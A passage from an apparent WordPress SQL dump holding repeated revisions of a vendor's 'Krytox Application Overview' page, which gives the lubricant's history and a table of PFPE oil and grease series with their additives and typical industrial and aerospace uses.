left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 16:18:31', '2016-12-22 16:18:31', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3331, 2, '2016-12-22 16:44:31', '2016-12-22 16:44:31', '<h3>[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/"googleplus="https://plus.google.com/105252144916647489581"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 16:44:31', '2016-12-22 16:44:31', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3332, 2, '2016-12-22 16:45:14', '2016-12-22 16:45:14', '<h3>[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed 